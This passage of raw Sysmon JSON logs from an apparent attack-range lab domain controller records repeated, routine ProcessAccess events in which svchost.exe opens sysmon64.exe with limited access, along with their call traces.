C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1603,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1604,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1605,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1606,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1607,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1608,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1609,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.408","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1610,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.408\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 